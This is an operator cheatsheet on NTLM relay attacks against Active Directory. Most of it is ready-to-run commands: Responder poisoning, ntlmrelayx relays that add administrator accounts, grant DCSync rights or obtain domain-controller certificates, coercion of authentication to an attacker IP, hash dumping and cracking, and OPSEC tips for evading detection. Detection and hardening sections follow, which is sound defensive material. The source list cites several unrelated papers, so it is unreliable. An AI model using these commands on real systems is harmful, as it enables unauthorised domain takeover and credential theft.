daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-7-ntlm-relay-attacks.md (29936B)


      1 ---
      2 title: "Attack #7 β€” NTLM Relay Attacks"
      3 description: "NTLM relay is a man-in-the-middle attack that intercepts an NTLM authentication challenge-response in transit and forwards it to a different target before…"
      4 category: active-directory
      5 subcategory: "Credential Access"
      6 tags: ["active-directory", "kerberos", "ntlm", "relay", "hashing"]
      7 tools: ["Nmap", "NetExec", "Impacket", "Rubeus", "Hashcat"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-One/πŸ”΄ Attack #7 β€” NTLM Relay Attacks.md"
     11 ---
     12 # πŸ”΄ Attack #7 β€” NTLM Relay Attacks
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 NTLM relay is a **man-in-the-middle attack** that intercepts an NTLM authentication challenge-response in transit and **forwards it to a different target** before the original session completes. The attacker never needs to crack or possess the password β€” they simply sit between the authenticating client and a vulnerable target server, acting as a transparent proxy that relays the victim's credentials to gain access as them. The entire attack hinges on one critical misconfiguration: **SMB signing not being enforced** on the target, which means the relayed authentication cannot be cryptographically verified as originating from the correct source.
     19 
     20 The NTLM three-way handshake is the mechanism being abused: the client sends a NEGOTIATE, the server responds with a CHALLENGE, and the client replies with an AUTHENTICATE response containing the Net-NTLMv2 hash. The attacker receives the victim's AUTHENTICATE response and immediately replays it against a target server of their choosing. Because Net-NTLMv2 is tied to the specific challenge issued by the server, you **cannot crack and reuse it for PtH** β€” but you absolutely can relay it live.
     21 
     22 > ⚠️ **Windows 11 / Server 2025:** SMB signing required by default in Windows 11 24H2+, fundamentally altering the attack landscape. NTLM is on Microsoft's deprecation timeline with Kerberos as the replacement. Organizations in transition periods are most vulnerable β€” partial enforcement creates windows where relay remains viable. Check SMB config per target; never assume blanket hardening.
     23 
     24 ### NTLM Relay vs Pass-the-Hash β€” Critical Distinction
     25 
     26 | Property | NTLM Relay | Pass-the-Hash |
     27 |---|---|---|
     28 | **What you capture** | Net-NTLMv2 challenge-response (live) | NT hash (from LSASS/SAM) |
     29 | **Can be cracked?** | Yes (Hashcat -m 5600) but slow | N/A β€” already a hash |
     30 | **Can be replayed for PtH?** | ❌ No | βœ… Yes |
     31 | **Requires live session** | βœ… Must relay in real time | ❌ Offline |
     32 | **Requires SMB signing disabled** | βœ… On target | ❌ |
     33 | **Credential access level needed** | None (intercept only) | Local admin for LSASS dump |
     34 
     35 ### The Full Attack Flow
     36 
     37 ```
     38 1. Identify targets with SMB signing not enforced (nmap / nxc scan)
     39 2. Build relay target list (machines where victim has admin or useful access)
     40 3. Start Responder in "listen only" mode (disable SMB/HTTP servers)
     41 4. Start ntlmrelayx pointing at target list
     42 5. Trigger NTLM authentication from victim:
     43    - LLMNR/NBT-NS/mDNS poisoning (passive β€” wait for victim to make typo)
     44    - Active coercion (PetitPotam, PrinterBug, mitm6)
     45 6. Responder poisons the name resolution β†’ victim authenticates to attacker
     46 7. ntlmrelayx receives Net-NTLMv2 β†’ relays to target server
     47 8. Gain access as victim:
     48    - SMB shell / command execution
     49    - SAM/NTDS hash dump
     50    - LDAP β€” add new DA account, DCSync rights, Shadow Credentials
     51    - ADCS β€” request machine certificate β†’ full domain compromise
     52 ```
     53 
     54 ### Cross-References β€” Related Techniques
     55 
     56 **Attack #7, #8, #9 form a trilogy:**
     57 - **#7** (NTLM Relay): The relay mechanism itself
     58 - **#8** (LLMNR/NBT-NS/mDNS): Primary auth trigger for #7
     59 - **#9** (mitm6): IPv6-based alternative trigger for #7
     60 
     61 **Coercion references:**
     62 - **#33** (ESC8): ADCS endpoint relay target
     63 - **#41** (PetitPotam): Coerce DC auth into relay
     64 - **#42** (PrinterBug): Coerce via Print Spooler
     65 - **#77** (DFSCoerce): Alternate coercion method
     66 
     67 ***
     68 
     69 ## βš™οΈ Prerequisites
     70 
     71 | Requirement | Detail |
     72 |---|---|
     73 | **SMB signing not enforced on target** | The single most critical requirement β€” signed SMB blocks relay to SMB |
     74 | **NTLM enabled** | Must be allowed in domain; increasingly disabled in modern environments |
     75 | **Network position** | Must be on same subnet / broadcast domain as victim to poison name resolution |
     76 | **Relay-capable target** | SMB (445), LDAP (389/636), HTTP, MSSQL, SMTP, RPC β€” multiple protocols supported |
     77 | **Victim triggers NTLM auth** | Via typo, coercion, or poisoned name resolution |
     78 
     79 ***
     80 
     81 ## πŸ› οΈ Tools
     82 
     83 | Tool | Platform | Role |
     84 |---|---|---|
     85 | **Responder** | Linux | Name resolution poisoner (LLMNR/NBT-NS/mDNS) β€” captures NTLM auth |
     86 | **ntlmrelayx.py** (Impacket) | Linux | Core relay engine β€” supports SMB, LDAP, LDAPS, HTTP, MSSQL, RPC, ADCS |
     87 | **mitm6** | Linux | IPv6 DNS spoofing β€” forces NTLM auth via rogue DHCPv6 server |
     88 | **MultiRelay.py** | Linux | Alternative relay tool; simpler setup |
     89 | **CrackMapExec / NetExec** | Linux | Enumerate SMB signing status; verify access post-relay |
     90 | **Nmap** | Linux | `smb2-security-mode.nse` β€” identify signing enforcement status |
     91 | **PetitPotam** | Linux/Win | Coerce DC authentication β†’ relay to ADCS for certificate |
     92 | **Hashcat** | Linux/Win | Crack captured Net-NTLMv2 hashes (mode 5600) if relay not viable |
     93 | **Krbrelayx** | Linux | Kerberos relay β€” relays Kerberos tickets instead of NTLM (more modern) |
     94 | **Coercer.py** | Linux | Multi-protocol coercion β€” centralized coercion orchestration |
     95 
     96 ***
     97 
     98 ## πŸ’» Full Commands
     99 
    100 ### πŸ”΅ Step 0 β€” Identify Relay Targets (SMB Signing Status)
    101 
    102 ```bash
    103 # ── Nmap β€” check SMB signing on specific host ─────────────────────────────────
    104 nmap --script smb2-security-mode.nse -p 445 10.10.10.0/24
    105 
    106 # Key output β€” "Message signing enabled but not required" = VULNERABLE
    107 # "Message signing enabled and required" = NOT vulnerable to SMB relay
    108 
    109 # ── NetExec β€” fast subnet-wide SMB signing check ─────────────────────────────
    110 nxc smb 10.10.10.0/24 --gen-relay-list relay_targets.txt
    111 # Automatically generates a file of IPs where signing is NOT enforced
    112 
    113 # ── NetExec β€” manual check with verbose output ───────────────────────────────
    114 nxc smb 10.10.10.0/24
    115 # Look for 'signing:False' in output β€” those are your relay targets
    116 
    117 # ── Check LDAP signing enforcement ────────────────────────────────────────────
    118 nxc ldap 10.10.10.10 -u '' -p '' --ldap-signing
    119 ```
    120 
    121 ***
    122 
    123 ### πŸ”΄ Core Setup β€” Responder + ntlmrelayx (SMB Relay)
    124 
    125 ```bash
    126 # ── STEP 1: Edit Responder config β€” DISABLE SMB and HTTP servers ──────────────
    127 # (Critical: if Responder responds to auth itself, you can't relay it)
    128 nano /etc/responder/Responder.conf
    129 # Set:  SMB = Off
    130 #       HTTP = Off
    131 
    132 # ── STEP 2: Start Responder to poison name resolution ─────────────────────────
    133 sudo responder -I eth0 -rdwv
    134 # -r  = enable answers for NetBIOS wredir suffix queries
    135 # -d  = enable answers for NBNS domain suffix queries
    136 # -w  = start WPAD rogue proxy server
    137 # -v  = verbose
    138 
    139 # ── STEP 3: Start ntlmrelayx pointing at relay target list ────────────────────
    140 
    141 # Basic relay to list of targets β€” interactive SMB shell
    142 ntlmrelayx.py -tf relay_targets.txt -smb2support -i
    143 # -i = interactive shell mode (connect via nc localhost 11000)
    144 # -smb2support = support SMBv2
    145 
    146 # Relay and execute a command directly
    147 ntlmrelayx.py -tf relay_targets.txt -smb2support -c "whoami > C:\pwned.txt"
    148 
    149 # Relay and dump SAM hashes (no shell needed)
    150 ntlmrelayx.py -tf relay_targets.txt -smb2support
    151 
    152 # ── STEP 4: When relay succeeds, connect to interactive shell ─────────────────
    153 nc 127.0.0.1 11000
    154 # You now have an SMB shell as the relayed victim user
    155 ```
    156 
    157 ***
    158 
    159 ### πŸ”΄ LDAP Relay β€” Domain Privilege Escalation (No SMB Signing Required on LDAP)
    160 
    161 ```bash
    162 # ── Relay to LDAP β€” auto-escalate: create new DA user ─────────────────────────
    163 ntlmrelayx.py -t ldap://10.10.10.10 -smb2support --escalate-user low_user
    164 
    165 # ── Relay to LDAP β€” add DCSync rights to controlled account ──────────────────
    166 ntlmrelayx.py -t ldap://DC01.corp.local -smb2support --escalate-user low_user
    167 # ntlmrelayx automatically adds Replication-Get-Changes-All to low_user
    168 # Then run DCSync:
    169 secretsdump.py corp.local/low_user:'Password1'@DC01.corp.local
    170 
    171 # ── Relay to LDAPS β€” dump full domain info (no signing required on LDAPS) ─────
    172 ntlmrelayx.py -t ldaps://10.10.10.10 -smb2support --dump-adcs
    173 ntlmrelayx.py -t ldaps://10.10.10.10 -smb2support --dump-laps
    174 
    175 # ── Relay to LDAP β€” Shadow Credentials attack (add msDS-KeyCredentialLink) ────
    176 ntlmrelayx.py -t ldap://10.10.10.10 --shadow-credentials \
    177   --shadow-target 'WORKSTATION01$' --no-validate-privs --no-dump --no-da
    178 # After success: use the generated .pfx to get a TGT via PKINIT
    179 # Workflow:
    180 #   1. Relay relayed auth to LDAP with --shadow-credentials
    181 #   2. ntlmrelayx generates a .pfx certificate file with new key credential
    182 #   3. Extract private key from .pfx (openssl)
    183 #   4. Use Rubeus/pyKerb to request TGT for target machine
    184 #   5. Access as target machine account (e.g., DC, service account)
    185 
    186 # ── Relay to LDAP β€” add new computer account (MAQ abuse) ─────────────────────
    187 ntlmrelayx.py -t ldap://10.10.10.10 --add-computer EVILPC EvilPass123!
    188 ```
    189 
    190 ***
    191 
    192 ### πŸ”΄ ADCS Relay β€” Full Domain Compromise (ESC8 Preview β€” Deep Dive in Attack #33)
    193 
    194 ```bash
    195 # ── Relay to ADCS HTTP endpoint (certsrv) β€” request DC machine certificate ────
    196 # First, identify ADCS server
    197 nxc ldap 10.10.10.10 -u low_user -p 'Password1' -M adcs
    198 
    199 # Start relay targeting ADCS web enrollment
    200 ntlmrelayx.py -t http://ADCS01.corp.local/certsrv/certfnsh.asp \
    201   -smb2support --adcs --template "DomainController"
    202 
    203 # Coerce DC authentication to attacker machine (PetitPotam β€” Attack #41)
    204 python3 PetitPotam.py -u low_user -p 'Password1' -d corp.local \
    205   <attacker_ip> <DC_IP>
    206 
    207 # ntlmrelayx relays DC auth to ADCS β†’ receives base64 certificate for DC$
    208 # Use Rubeus to request TGT for the DC using the certificate
    209 .\Rubeus.exe asktgt /user:DC01$ /certificate:<base64_cert> /ptt
    210 
    211 # Now perform DCSync as DC01$ (has replication rights by default)
    212 secretsdump.py -k -no-pass corp.local/'DC01$'@DC01.corp.local
    213 # Game over β€” all domain hashes dumped
    214 ```
    215 
    216 ***
    217 
    218 ### πŸ”΄ SMB Relay with Specific Target (Single High-Value Host)
    219 
    220 ```bash
    221 # Target a specific machine instead of a list
    222 ntlmrelayx.py -t smb://10.10.10.20 -smb2support -i
    223 
    224 # Execute specific commands on target
    225 ntlmrelayx.py -t smb://10.10.10.20 -smb2support \
    226   -c "net user hacker P@ssw0rd123 /add && net localgroup administrators hacker /add"
    227 
    228 # Relay to MSSQL and execute commands via xp_cmdshell
    229 ntlmrelayx.py -t mssql://10.10.10.30 -smb2support -q "exec xp_cmdshell 'whoami'"
    230 
    231 # Relay to multiple different protocols simultaneously
    232 ntlmrelayx.py -tf relay_targets.txt -smb2support \
    233   -t ldap://10.10.10.10 -t smb://10.10.10.20
    234 ```
    235 
    236 ***
    237 
    238 ### πŸ”΄ Kerberos Relay (Krbrelayx) β€” Beyond NTLM
    239 
    240 ```bash
    241 # ── Krbrelayx β€” relay Kerberos tickets instead of NTLM (more modern, stealthier)
    242 # Setup: listen for Kerberos auth and relay to target service
    243 python3 krbrelayx.py --krbsock 127.0.0.1:3333 -target smb://10.10.10.20 -spn cifs/10.10.10.20
    244 
    245 # From another terminal, use a tool that initiates Kerberos auth toward krbrelayx
    246 # Example: obtain a Kerberos TGS and relay it
    247 # Advantages over NTLM relay:
    248 #   - Bypasses NTLM restrictions on newer Windows versions
    249 #   - Relayed ticket can be used for multiple targets
    250 #   - Less logging (Kerberos tickets are expected in normal auth)
    251 
    252 # ── Krbrelayx with specific TGS delegation ────────────────────────────────────
    253 # Relay TGS to impersonate users
    254 python3 krbrelayx.py -spn cifs/target.corp.local --krbsock 127.0.0.1:3333
    255 ```
    256 
    257 ***
    258 
    259 ### πŸ”΄ Capturing & Cracking Net-NTLMv2 (Alternative if Relay Blocked)
    260 
    261 ```bash
    262 # ── Responder captures Net-NTLMv2 hashes (when relay isn't viable) ────────────
    263 # Enable SMB and HTTP in Responder.conf (opposite config from relay)
    264 sudo responder -I eth0 -rdwv
    265 
    266 # Hashes saved to: /usr/share/responder/logs/
    267 ls /usr/share/responder/logs/
    268 
    269 # ── Crack Net-NTLMv2 with Hashcat (mode 5600) ─────────────────────────────────
    270 hashcat -m 5600 ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt
    271 
    272 # With rules
    273 hashcat -m 5600 ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt \
    274   -r /usr/share/hashcat/rules/best64.rule
    275 
    276 # Hash format looks like:
    277 # Administrator::CORP:aabbccddeeff0011:Hash:ChallengeResponse
    278 ```
    279 
    280 ***
    281 
    282 ### πŸ”΄ Triggering NTLM Authentication (Coercion Methods)
    283 
    284 ```bash
    285 # ── Method 1: LLMNR/NBT-NS Poisoning (passive β€” wait for typo) ───────────────
    286 # Just run Responder and wait β€” any victim who mistypes a hostname will
    287 # trigger NTLM auth to your machine automatically
    288 
    289 # ── Method 2: PetitPotam (coerce DC auth) ────────────────────────────────────
    290 python3 PetitPotam.py -u low_user -p 'Password1' -d corp.local \
    291   <attacker_ip> <DC_IP>
    292 
    293 # ── Method 3: PrinterBug / SpoolSample (coerce any host with Print Spooler) ──
    294 python3 SpoolSample.py <target_ip> <attacker_ip>
    295 
    296 # ── Method 4: Coercer.py (multi-protocol coercion toolkit) ────────────────────
    297 python3 Coercer.py coerce -u low_user -p 'Password1' -d corp.local \
    298   -l <attacker_ip> -t <target_ip>
    299 # Coercer supports multiple coercion methods:
    300 #   - [+] PetitPotam (EFS RPC)
    301 #   - [+] PrinterBug (Spooler RPC)
    302 #   - [+] DFSCoerce (NetDFS RPC)
    303 #   - [+] ShadowCoerce (VSS RPC)
    304 #   - [+] WebClient coercion (via HTTP forcing)
    305 # Automatically rotates through available methods
    306 
    307 # Full syntax:
    308 python3 Coercer.py coerce \
    309   -u low_user \
    310   -p 'Password1' \
    311   -d corp.local \
    312   -l 192.168.1.100 \
    313   -t 192.168.1.50 \
    314   --method all  # Try all coercion methods
    315 
    316 # ── Method 5: mitm6 (IPv6 coercion β€” covered in Attack #9) ───────────────────
    317 sudo mitm6 -d corp.local
    318 ntlmrelayx.py -6 -t ldaps://DC01.corp.local -smb2support \
    319   --add-computer EVILPC EvilPass123!
    320 
    321 # ── Method 6: DFSCoerce (Attack #77) β€” reliable RPC coercion ─────────────────
    322 python3 DFSCoerce.py -d corp.local -u low_user -p 'Password1' \
    323   <attacker_ip> <target_ip>
    324 ```
    325 
    326 ***
    327 
    328 ## 🎯 OPSEC Tips
    329 
    330 - **Always disable SMB/HTTP in Responder** when running ntlmrelayx β€” if Responder responds first, the relay chain breaks
    331 - **Target LDAP over SMB** when possible β€” LDAP relay grants persistent privileges (DCSync rights, new accounts) rather than just a shell
    332 - **ADCS relay is the most destructive** β€” a single relayed DC machine account auth β†’ certificate β†’ TGT β†’ DCSync β†’ full domain in under 60 seconds
    333 - **Don't relay back to the victim's own machine** β€” Windows blocks loopback NTLM relay; you'll waste the auth attempt
    334 - **Use `--no-da --no-acl`** flags in ntlmrelayx when you don't want noisy LDAP modifications and just want to dump info first
    335 - **Rotate relay targets** β€” hitting the same target repeatedly increases detection probability
    336 - **Check for LDAP channel binding** β€” LDAPS with channel binding enabled blocks LDAP relay even without signing
    337 - **Krbrelayx for modern environments** β€” Organizations phasing out NTLM use Kerberos relay instead; blend in with legitimate auth
    338 - **DFSCoerce as coercion fallback** β€” More reliable than PrinterBug on patched systems; less logged than PetitPotam
    339 - **Time-to-execute**: LLMNR trigger β†’ relay β†’ DA access in 2-5 minutes if fully automated; ADCS relay slightly longer due to certificate generation
    340 
    341 ***
    342 
    343 ## 🧩 Troubleshooting
    344 
    345 | Error | Cause | Fix |
    346 |---|---|---|
    347 | **STATUS_ACCESS_DENIED on relay** | Target rejects relayed auth (signing enabled or channel binding active) | Verify SMB signing status with `nxc smb <IP> \| grep signing`. Check for channel binding on LDAP with `nxc ldap <IP> --ldap-signing` |
    348 | **LDAP signing required β€” relay fails** | LDAP signing enforced on domain controller | Relay to LDAPS (636) instead; if both fail, target is hardened β€” move to next target |
    349 | **Channel binding failure** | LDAPS with EPA (Enhanced Protection) enabled | No LDAP relay possible; use SMB or ADCS targets instead; check `Get-ADOrganizationalUnit` for hardening level |
    350 | **ntlmrelayx connection timeout** | Target doesn't respond or firewall blocks outbound relay attempt | Verify target is actually vulnerable (signing check), ensure network path is open, try `-vv` verbose flag to see handshake details |
    351 | **Responder and ntlmrelayx not working together** | SMB/HTTP still enabled in Responder.conf | Edit `/etc/responder/Responder.conf`: SMB = Off, HTTP = Off; restart both tools |
    352 | **"No suitable relay target found"** | All targets have SMB signing enabled | Expand scope: scan more subnets, or pivot to LDAP/ADCS relay instead of SMB-only |
    353 | **Certificate not issued by ADCS during relay** | Web enrollment endpoint requires specific cert template permissions | Verify template access with `certutil -catemplates`; template may require DCSync rights; use `--template "*"` to auto-select |
    354 | **ntlmrelayx receives auth but relay fails silently** | SMB relay receiving client auth but target rejects it (bad signing check/wrong user perms) | Run with `-vv` to see full relay handshake; verify user has admin on target; test with manual SMB shell first |
    355 
    356 ***
    357 
    358 ## πŸ—ΊοΈ MITRE ATT&CK
    359 
    360 **Technique: T1557.001 β€” Adversary-in-the-Middle**
    361 
    362 **Tactics:**
    363 - **TA0006: Credential Access** β€” Capture NTLM hashes via man-in-the-middle
    364 - **TA0008: Lateral Movement** β€” Use relayed credentials to pivot to target systems
    365 
    366 **APT Groups Using NTLM Relay:**
    367 - **APT28 (Fancy Bear)** β€” Documented NTLM relay in internal networks
    368 - **APT29 (Cozy Bear)** β€” Active Directory lateral movement via relay techniques
    369 - **APT41** β€” Relay attacks in post-compromise movement
    370 - **Wizard Spider** β€” NTLM relay for domain escalation in ransomware campaigns
    371 - **Scattered Spider** β€” Multi-stage relay attacks for persistence
    372 
    373 **Related techniques:**
    374 - T1040: Network Sniffing
    375 - T1187: Forced Authentication
    376 - T1550.001: Pass the Ticket (Kerberos relay equivalent)
    377 - T1550.002: Pass the Hash (related credential reuse)
    378 
    379 ***
    380 
    381 ## πŸ›‘οΈ Detection β€” Event IDs
    382 
    383 | Event ID | Source | What to Look For |
    384 |---|---|---|
    385 | **4624** | Security Log | Logon Type 3 (network) β€” source IP doesn't match the account's known workstation |
    386 | **4776** | Security Log | NTLM credential validation β€” source machine is unexpected for the authenticating user |
    387 | **4768 / 4769** | Security Log | Kerberos tickets requested immediately after NTLM logon β€” attacker pivoting |
    388 | **4741** | Security Log | New computer account created β€” ntlmrelayx `--add-computer` |
    389 | **4728 / 4732** | Security Log | User added to privileged group β€” escalation via LDAP relay |
    390 | **4662** | Security Log | Operation performed on AD object β€” DCSync rights being added via LDAP relay |
    391 | **5145** | Security Log | Network share object checked β€” SMB relay access attempts |
    392 | **LDAP query logs** | DC Diagnostic | Unusual LDAP modifications from a low-privilege account (adding ACEs, computer accounts) |
    393 
    394 **Primary detection signature:** Event 4624 Type 3 logon where the **source workstation name doesn't match the account's registered computer** β€” this is the clearest relay indicator. On modern SIEMs, correlating a Responder poison event (DNS/LLMNR anomalies) with a subsequent 4624 from a new source IP is near-definitive.
    395 
    396 ### Sigma Rules (SigmaHQ)
    397 
    398 ```
    399 Rule ID: detection_ntlm_relay_credential_access
    400 Description: Detects multiple LLMNR/NBT-NS queries answered by same source IP
    401 Event filter: Unusual responder patterns; multiple different hostnames answered by single IP
    402 Status: MEDIUM severity
    403 
    404 Rule ID: detection_ldap_relay_escalation
    405 Description: Detects LDAP modifications from unexpected source during relay window
    406 Event filter: msDS-KeyCredentialLink modifications, DCSync ACL adds from non-DC source
    407 Status: HIGH severity
    408 ```
    409 
    410 ### EDR Detections
    411 
    412 **Microsoft Defender for Identity:**
    413 - Alert: "Suspected NTLM relay attack" β€” detects source IP responding to multiple authentication queries
    414 - Alert: "Unusual LDAP query" β€” flags DCSync right additions from unexpected principals
    415 - Alert: "Suspicious computer account creation" β€” MAQ abuse detection
    416 
    417 **Falcon (CrowdStrike):**
    418 - Network signature: "Lateral movement β€” SMB relay activity"
    419 - Process: ntlmrelayx.py execution detected
    420 - Behavioral: Privilege escalation via LDAP modification
    421 
    422 ### Hardening Commands
    423 
    424 ```powershell
    425 # ── Enable SMB signing on all machines ───────────────────────────────────────
    426 # GPO: Computer Configuration β†’ Admin Templates β†’ Network β†’ SMB Server
    427 # Set: "Digitally sign communications (if client agrees)" β†’ Enabled AND "required"
    428 
    429 # ── Registry-based (direct on host) ──────────────────────────────────────────
    430 reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v RequireSecuritySignature /t REG_DWORD /d 1 /f
    431 reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v EnableSecuritySignature /t REG_DWORD /d 1 /f
    432 
    433 # ── Enforce SMB Signing via PowerShell (immediate) ────────────────────────────
    434 $path = "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
    435 Set-ItemProperty -Path $path -Name RequireSecuritySignature -Value 1 -Force
    436 Set-ItemProperty -Path $path -Name EnableSecuritySignature -Value 1 -Force
    437 Restart-Service LanmanServer -Force
    438 
    439 # ── Enable LDAP signing (block LDAP relay) ──────────────────────────────────
    440 reg add "HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" /v LDAPServerIntegrity /t REG_DWORD /d 2 /f
    441 # Value: 0 = None, 1 = Negotiate signing, 2 = Required
    442 
    443 # ── Enable LDAP channel binding (block LDAPS relay even without signing) ───────
    444 reg add "HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" /v "CBT Extended Protection" /t REG_DWORD /d 1 /f
    445 
    446 # ── Disable NTLM entirely (most aggressive) ──────────────────────────────────
    447 # GPO: Computer Configuration β†’ Admin Templates β†’ Network β†’ Restrict NTLM
    448 # Set: "Restrict NTLM: Outgoing NTLM traffic from all computers" β†’ Deny All
    449 
    450 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RestrictNTLMInDomain /t REG_DWORD /d 7 /f
    451 # 7 = Deny for all, 4 = Deny for servers only
    452 
    453 # ── Configure EPA (Extended Protection for Authentication) ────────────────────
    454 # GPO: Computer Configuration β†’ Admin Templates β†’ Network β†’ NTLM β†’
    455 # Set: "Extended Protection for NTLM Authentication Service" β†’ Required
    456 
    457 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" /v ExtendedProtectionLevel /t REG_DWORD /d 2 /f
    458 # 0 = Off, 1 = Allow (compatible), 2 = Required (most secure)
    459 
    460 # ── Verify all settings applied ──────────────────────────────────────────────
    461 .\Verify-SMBSigning.ps1  # Custom script to audit all machines
    462 ```
    463 
    464 ***
    465 
    466 ## πŸ”— Attack Chain Context
    467 
    468 ```
    469 [NTLM Relay] ──→ Multiple Escalation Paths Depending on Target Protocol
    470          β”‚
    471          β”œβ”€β”€β†’ SMB Relay β†’ shell/code execution as victim user β†’ LSASS dump β†’ PtH
    472          β”œβ”€β”€β†’ LDAP Relay β†’ add DCSync ACE to own account β†’ dump all hashes
    473          β”œβ”€β”€β†’ LDAP Relay β†’ Shadow Credentials β†’ PKINIT TGT β†’ DA access
    474          β”œβ”€β”€β†’ ADCS Relay (ESC8) β†’ DC machine cert β†’ TGT β†’ DCSync β†’ game over
    475          β”œβ”€β”€β†’ MSSQL Relay β†’ xp_cmdshell β†’ code execution as SQL service account
    476          β”œβ”€β”€β†’ Kerberos Relay (Krbrelayx) β†’ TGS relay β†’ multi-target lateral move
    477          └──→ Net-NTLMv2 capture β†’ Hashcat crack β†’ valid plaintext credentials
    478 ```
    479 
    480 ### Protocol Relay Compatibility Matrix
    481 
    482 | Relay Target | SMB Signing Needed? | LDAP Signing Needed? | Channel Binding | Privilege Impact |
    483 |---|---|---|---|---|
    484 | **SMB** | Must be disabled | N/A | N/A | Shell/code exec as victim |
    485 | **LDAP** | N/A | Must be disabled | Must be disabled | ACL modification, user creation |
    486 | **LDAPS** | N/A | N/A | Must be disabled | Same as LDAP but encrypted |
    487 | **ADCS HTTP** | N/A | N/A | N/A | Certificate β†’ TGT β†’ DCSync |
    488 | **MSSQL** | N/A | N/A | N/A | xp_cmdshell code execution |
    489 
    490 ***
    491 
    492 > βœ… **Attack #7 β€” NTLM Relay complete.** Tell me to move on when you're ready for **Attack #8 β€” LLMNR / NBT-NS / mDNS Poisoning**.
    493 
    494 Sources
    495  NTLM relay | The Hacker Recipes https://www.thehacker.recipes/ad/movement/ntlm/relay
    496  CQURE Hacks #68: NTLM Relay Attacks Explained and Why It's ... https://cqureacademy.com/blog/ntlm-relay-attacks-and-why-to-phase-out/
    497  SMB Relay Attacks and Active Directory - TCM Security https://tcm-sec.com/smb-relay-attacks-and-how-to-prevent-them/
    498  Understanding NTLM Authentication and NTLM Relay Attacks https://www.vaadata.com/blog/understanding-ntlm-authentication-and-ntlm-relay-attacks/
    499  NTLM Relay Attacks in Practice: Exploiting Missing SMB Signing https://cqureacademy.com/blog/ntlm-relay-attacks-exploiting-missing-smb-signing/
    500  Network Relaying Abuse in a Windows Domain https://www.lrqa.com/en/cyber-labs/network-relaying-abuse-windows-domain/
    501  NTLM Relay Attacks Targeting Microsoft Domain Controllers https://cloudsecurityalliance.org/blog/2022/08/11/detecting-and-mitigating-ntlm-relay-attacks-targeting-microsoft-domain-controllers
    502  An Open-Source Approach to Detect Pass-the-Hash Attack in Active Directory Using Wazuh and Sysmon https://link.springer.com/10.1134/S0361768825700483
    503  Penetration Testing and Exploitation of Active Directory Configuration Vulnerabilities https://ieeexplore.ieee.org/document/10895772/
    504  Bridging Bridging Gaps in Active Directory Security: Threat Landscape, Limitations, and Future-Proof Solutions https://ijeci.lgu.edu.pk/index.php/ijeci/article/view/3
    505  AUTHENTICATION METHODS IN ACTIVE DIRECTORY AND THEIR IMPACT ON CORPORATE ENVIRONMENT SECURITY https://csecurity.kubg.edu.ua/index.php/journal/article/view/807
    506  Penetration Testing Platforms for Active Directory Network Environment https://www.ijltemas.in/DigitalLibrary/Vol.13Issue4/06-10.pdf
    507  Cyber Kill Chain Framework Approach to Map Potential Attack Vectors on Windows-based OS https://ijecbe.ui.ac.id/go/article/view/107
    508  Kerberos under Attack https://www.semanticscholar.org/paper/3af20812633e95bb2062ed94528c116769cbd2aa
    509  Privilege Escalation Exploiting MS Exchange https://www.semanticscholar.org/paper/01175ce9630f49d7434518c30f8a0468213090b2
    510  Honey Onions: Exposing Snooping Tor HSDir Relays https://www.semanticscholar.org/paper/3ff1793ac5036dbc68b669ac43d4b0c235ea0745
    511  Hacking Exposed Windows 2000: Network Security Secrets and Solutions https://www.semanticscholar.org/paper/e7b97bd62a710d9dde5e45be9b53c356fd309d52
    512  Detecting Forged Kerberos Tickets in an Active Directory Environment https://arxiv.org/ftp/arxiv/papers/2301/2301.00044.pdf
    513  Preventing Time Synchronization in NTP's Broadcast Mode https://arxiv.org/pdf/2005.01783.pdf
    514  Securing Wi-Fi 6 Connection Establishment Against Relay and Spoofing Threats http://arxiv.org/pdf/2501.01517.pdf
    515  HADES: Detecting Active Directory Attacks via Whole Network Provenance Analytics http://arxiv.org/pdf/2407.18858.pdf
    516  Optimizing Cyber Response Time on Temporal Active Directory Networks Using Decoys http://arxiv.org/pdf/2403.18162.pdf
    517  Applying recent secure element relay attack scenarios to the real world: Google Wallet Relay Attack http://arxiv.org/pdf/1209.0875.pdf
    518  The Impact of DNS Insecurity on Time https://arxiv.org/pdf/2010.09338.pdf
    519  Spoiled Onions: Exposing Malicious Tor Exit Relays http://arxiv.org/pdf/1401.4917.pdf
    520  KB5005413: Mitigating NTLM Relay Attacks on Active Directory ... https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429
    521  Windows 11 will require SMB signing to prevent NTLM relay attacks https://neosolutions.ca/windows-11-will-require-smb-signing-to-prevent-ntlm-relay-attacks/
    522  Unpatched AD CS Vulnerability Exploitation with NTLMRelayx https://www.youtube.com/watch?v=8M9kbWE1wyM
    523  Practical SMB Relay Attack - YouTube https://www.youtube.com/watch?v=9i5rBOkkjC0
    524  Exploring Uncommon NTLM Relay Attack Techniques https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/
    525  CQURE Hacks #68: NTLM Relay Attacks Explained β€” and Why It's Time to Phase Out NTLM https://www.youtube.com/watch?v=7py2n9gwzko
    526  SMB Signing and NTLM Relay Attack Explained with Practical Demo https://www.youtube.com/watch?v=INRd9XAHaWU
    527  IPv6 Attack with MITM6 & NTLMRELAYX https://www.youtube.com/watch?v=AmcWc2CjXx8